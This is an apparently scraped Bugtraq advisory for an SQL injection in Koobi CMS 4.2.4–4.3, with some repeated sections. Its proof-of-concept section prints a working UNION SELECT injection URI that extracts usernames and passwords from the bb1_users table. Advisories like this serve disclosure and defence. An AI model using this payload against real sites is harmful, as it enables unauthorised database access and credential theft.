Koobi 'index.php' SQL Injection Vulnerability
BID:41562
Info
Koobi 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 41562 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 12 2010 12:00AM |
| Updated: | Jul 15 2010 05:06PM |
| Credit: | azer azer |
| Vulnerable: |
dream4 Koobi CMS 4.3 dream4 Koobi CMS 4.2.5 dream4 Koobi CMS 4.2.4 |
| Not Vulnerable: | |
Discussion
Koobi 'index.php' SQL Injection Vulnerability
Koobi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Koobi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Koobi 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?p=gallerypic&img_id=[SQLi]
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?p=gallerypic&img_id=[SQLi]
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
References
Koobi 'index.php' SQL Injection Vulnerability
References:
References: